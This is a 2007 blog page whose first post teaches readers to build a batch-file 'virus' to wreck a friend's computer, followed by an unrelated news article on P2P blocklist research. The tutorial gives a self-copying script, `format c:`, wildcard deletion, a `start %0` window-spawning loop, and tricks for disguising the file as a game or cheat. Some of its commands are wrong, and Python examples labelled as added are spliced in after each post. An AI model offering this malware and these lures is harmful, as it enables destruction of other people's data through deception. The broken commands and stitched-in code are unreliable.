Saturday, November 24, 2007

Home Made Virus!

Do you Hate your friend? Want to demolish his computer?

Then you got to do this.....!!!

Here are some steps to create a Virus. Yes, that Computer virus that INFECTS the Computer.

Use any Text Editor.

Index

1. Tools

2. What makes a virus a virus?

3. Making your first batch file

4. Making a batch virus

5. Destructive commands

6. Most common tricks used to make someone open the file


Go on step by step

1. Tools

To make a batch program you will need a text program (e.g. Word, Notepad, WordPad, etc.) and a keyboard. If you don’t have one, you can use the on-screen keyboard.

To get to the on-screen keyboard, Go to:

Start → All Programs → Accessories → Accessibility

2. What makes a virus a virus?

When people think of a virus they think of a computer virus, but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do, but a virus is called a virus because it copies itself. Like a virus in your body, it copies itself to other cells because it can’t live without a host. It is the same with the computer virus: without a file or a program, a virus can’t be made. So all computer viruses are programs that copy themselves, but some people put destructive code in them.

3. Making a Batch file

I’m going to use Notepad; you can use whatever you want.

We are also going to make a “Hello World” application, which is the first program you make in any language. When making a batch file you are always going to use this line first -

@echo off

You can turn it on if you like. All it does is tell the program not to display its location. If you turn it on, the program will show where it is on the computer along with each command it runs. You can experiment a little if you want.

Now we are going to make it say Hello World. To do this we need an ‘echo’ command, which looks like this -

echo

This tells the program to write something. Since we want it to say Hello World we are going to type Hello World next to echo to make it look like this -

echo Hello World

So at this point you should have -

@echo off

echo Hello World

Now go to File, Save and name it ‘test.bat’. (You can name it whatever you want as long as it has .bat at the end.) Save it to the desktop so you can get to it faster. Then run it. You should see a black box open and close really fast. To fix this we need a ‘pause’ command, and we will also need a ‘goto’ command. The goto command is the most important command. If you don’t know, the goto command tells the program where to go next. Since we need a pause command, we want it to go to pause, so we need to write goto pause like this -

goto pause

Now you should have -

@echo off

echo Hello World

goto pause

Now we need a subsection named pause. You make a subsection by putting a ‘:’ (colon) before the first word, like this -

:start

or

:end

But we said go to pause, so we need one named pause, like this -

:pause

Then under that we are going to write pause -

:pause

pause

This just makes it so the box stays open until you press a key.

Optional

You can put an ‘exit’ at the end of pause, where the goto command should go, but you don’t have to.

Save and run it now. You should be able to read your text now.

4. Making a Batch file into a virus

This is a lot easier than some people think. To make a virus you just need the ‘copy’ command, which looks like this -

copy

So let’s make a new one. By reading Section 3 you should know you need the @echo off

@echo off

copy

All right, we are going to name this file first, and we are going to make it copy itself to C:\WINDOWS just because no one looks in there. This is what it looks like (I will explain it) -

@echo off

copy first C:\WINDOWS

copy - tells it to copy

first - is just the name of the file we want to copy

C:\WINDOWS - is the place you want to copy to

That is a virus!

5. Destructive commands

If you get pissed at someone you might want to send him something to mess with him. Here are some commands to add to the virus.

del - this deletes the files.

del file name

del (.txt*)

The (.txt*) would delete all txt files on the computer. The * at the end just means all instead of a file called .txt

deltree - this deletes the whole folder.

You can remember it like this -

Think of a tree. If you type ‘del’ you are only deleting a part of the tree, but if you type ‘deltree’ you are deleting the whole tree.

format - this deletes everything.

format c:

This deletes everything on the C drive.

open - This is just fun to use to scare someone without doing damage to anything.

open, then the name of the program. For example, to open Notepad type -

open notepad

To open Microsoft Paint type -

open mspaint

Just put a crap load in there. Also, the next one that can be very useful is looping. This will make the file repeat itself till it is shut off. Say your first subsection is called start. You would just make the goto command go to start, like -

@echo off

:start

start notepad

goto start

That will open Notepad over and over, and if they don’t close it, it can crash their computer. To open the command window you have to use a ‘var’, like %% (not going to explain var; it would be confusing).

@echo off

:whatever

start %0

goto whatever

This will open the black box over and over.
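From the defender's side, the behaviours covered in sections 4 and 5 (a script copying itself, destructive commands, and a goto loop that keeps spawning windows) can be flagged statically before a received .bat file is ever run. The following Python scanner is an added example, not part of the original post; the `scan_batch` function, the finding names and the sample scripts (built from lines shown above) are assumptions made for illustration.

```python
import re

# Heuristic patterns for the behaviours described in sections 4 and 5.
DESTRUCTIVE = re.compile(r"^@?\s*(format\s+[a-z]:|deltree\b|(del|erase)\s+.*[*?])", re.I)
COPY = re.compile(r'^@?\s*x?copy\s+("[^"]+"|\S+)', re.I)
SELF_REF = re.compile(r"%~?[a-z]*0\b", re.I)   # %0, %~f0, %~dpnx0
GOTO = re.compile(r"^@?\s*goto\s+:?(\S+)", re.I)
START = re.compile(r"^@?\s*start\b", re.I)

def scan_batch(text, script_name):
    """Return sorted (line_no, finding) pairs for one batch script."""
    stem = script_name.rsplit(".", 1)[0].lower()
    findings, labels, lines = [], {}, text.splitlines()
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        # Remember where each :label sits ("::" is a comment, not a label).
        if line.startswith(":") and not line.startswith("::") and line[1:].split():
            labels[line[1:].split()[0].lower()] = no
        if DESTRUCTIVE.match(line):
            findings.append((no, "destructive-command"))
        m = COPY.match(line)
        if m:
            src = m.group(1).strip('"').lower()
            # Source is the running script (%0) or the script's own name.
            if SELF_REF.search(src) or src in (stem, script_name.lower()):
                findings.append((no, "self-copy"))
        g = GOTO.match(line)
        if g and g.group(1).lower() in labels:   # jump back to an earlier label
            body = lines[labels[g.group(1).lower()]:no - 1]
            if any(START.match(b.strip()) for b in body):
                findings.append((no, "unbounded-spawn-loop"))
    return sorted(findings)

# Constructed samples, assembled from lines that appear in this post.
SAMPLE_SCRIPT = r"""@echo off
echo Hello World
copy first C:\WINDOWS
format c:
:whatever
start %0
goto whatever
"""
BENIGN_SCRIPT = "@echo off\necho Hello World\ngoto pause\n:pause\npause\n"

if __name__ == "__main__":
    for line_no, finding in scan_batch(SAMPLE_SCRIPT, "first.bat"):
        print(line_no, finding)
```

The forward `goto pause` in the Hello World script is not flagged, because only a jump back to an earlier label with a `start` in between counts as a spawn loop.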

6. Most common tricks

People will put it in a folder with a couple of readme documents and call it a game. We will say - Check this out, it is so cool!

OR

We will say - check out this hack or cheat I found for this game

Send them a zip file, and tell them to unzip.

Examples

For just a simple message it is -

@echo off

echo *insert MSG here*

goto pause

:pause

pause

For a rapid command-prompt-type screen it is -

@echo off

:whatever

start %0

goto whatever

For rapid Notepad it is -

@echo off

:start

start notepad

goto start

For rapid MS Paint it is -

@echo off

:start

start ms paint

goto start

Quite Long but good to try...




Friday, October 26, 2007

P2P researchers: use a blocklist or you will be tracked... 100% of the time

The old cliché "You're not paranoid if they really are out to get you" turns out to apply quite nicely to the world of P2P file-sharing. A trio of intrepid researchers from the University of California-Riverside decided to see just how often a P2P user might be tracked by content owners. Their startling conclusion: "naive" users will exchange data with such "fake users" 100 percent of the time.

Anirban Banerjee, Michalis Faloutsos, and Laxmi Bhuyan collected more than 100GB of TCP header information from P2P networks back in early 2006 using a specially-doctored client. The goal of the research was a simple one: to determine "how likely is it that a user will run into such a 'fake user' and thus run the risk of a lawsuit?" The results are outlined in a recent paper (PDF), "P2P: Is Big Brother Watching You?"

For years, P2P communities have suspected that affiliates of the RIAA, the MPAA, and others have been haunting P2P networks to look for those who might be swapping copyrighted files. It's more than a hunch; it's well documented that companies like SafeNet (formerly Media Sentry) engage in this sort of work, and that their testimony is routinely produced at trials. It helped to bring down Jammie Thomas, in fact.

But identifying these organizations is hard. The nature of their business is to remain shadowy, but P2P advocates have spent years compiling "blocklists" of IP ranges that are suspected of belonging to such companies. Connect to a "user" who has an IP address in one of the blocklists and bam: you've just been tracked swapping a file.

By parsing all of the TCP headers that they collected over the course of 90 days, the UC-Riverside researchers came to several conclusions:

  1. If you don't use a blocklist, you will be tracked. Every one of the researchers' test clients that did not use a blocklist soon connected to an IP address found within those lists. It turns out that 12 to 17 percent of all IP addresses on the network belonged to these blocklisted ranges.
  2. Trackers aren't that hard to avoid. While "naive" clients may all connect to blocklisted users, it wasn't that hard to stay away from the vast majority of such "fake users." Researchers found that "avoiding just the top 5 blocklisted IPs reduces the chance of being tracked to about 1 percent."
  3. Content owners hide their tracks. Much of this tracking work is farmed out from content owners to companies like SafeNet and BayTSP, and these companies in turn take care to hide their tracks. When the researchers ran reverse DNS lookups on the blocklisted ranges, they found that only 0.5 percent of those addresses resolved back to media companies in an obvious way.
  4. Meet the BOGONS. One of the strategies for remaining anonymous is to operate from BOGON IP ranges. These ranges are unallocated blocks of addresses that should ordinarily not be used on the public Internet. Of the top fifteen blocklist entities that were discovered during testing, 12 were in BOGON ranges. The researchers note that "these sources deliberately wish to conceal their identities while serving files on P2P networks," and reverse DNS queries on these addresses produce little useful information.

The takeaway here is simple: P2P users who don't utilize the blocklists are just about guaranteed to be tracked by "fake users" operating out of those ranges, and thus seem to open the door to possible litigation should the dice be rolled against them.

The study does have one major caveat, however; it does not attempt to determine if the blocklists actually correspond to tracking organizations like SafeNet. The researchers note that "this would be interesting and challenging future work." While using a blocklist makes it easy to avoid connecting to IP addresses found on that list, it's not clear that every range on the lists is really a tracker. Conversely, there's no way to know if addresses not on the list might in fact be tracking users.

- Nate Anderson
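
The measurement behind findings 1 and 2, as an added Python example that is not from the article or the paper: it takes peer addresses and a blocklist of CIDR ranges and reports the share of distinct peers inside listed ranges, the most-hit ranges, and the share left once the top ranges are avoided. The function name, the result keys and the sample addresses (RFC 5737 documentation ranges) are constructed for illustration, and the share of distinct peers stands in for the paper's per-connection tracking probability.

```python
import ipaddress
from collections import Counter

def blocklist_exposure(peer_ips, blocklist, top_n=1):
    """Share of distinct peers in blocklisted ranges, before and after
    avoiding the top_n most frequently hit ranges."""
    nets = [ipaddress.ip_network(cidr) for cidr in blocklist]
    peers = {ipaddress.ip_address(p) for p in peer_ips}   # de-duplicate peers
    if not peers:
        return {"listed_fraction": 0.0, "top_ranges": [], "residual_fraction": 0.0}
    hits = Counter()
    for ip in peers:
        for net in nets:
            if ip in net:          # count each peer once, under its first match
                hits[net] += 1
                break
    listed = sum(hits.values())
    top = hits.most_common(top_n)
    avoided = sum(count for _, count in top)
    return {
        "listed_fraction": listed / len(peers),
        "top_ranges": [(str(net), count) for net, count in top],
        "residual_fraction": (listed - avoided) / len(peers),
    }

# Constructed sample: ten distinct peers, one of them seen twice.
SAMPLE_PEERS = [
    "192.0.2.10", "192.0.2.11", "192.0.2.12", "192.0.2.10",
    "198.51.100.7",
    "203.0.113.1", "203.0.113.2", "203.0.113.3",
    "203.0.113.4", "203.0.113.5", "203.0.113.6",
]
SAMPLE_BLOCKLIST = ["192.0.2.0/24", "198.51.100.0/25"]   # constructed ranges

if __name__ == "__main__":
    print(blocklist_exposure(SAMPLE_PEERS, SAMPLE_BLOCKLIST, top_n=1))
```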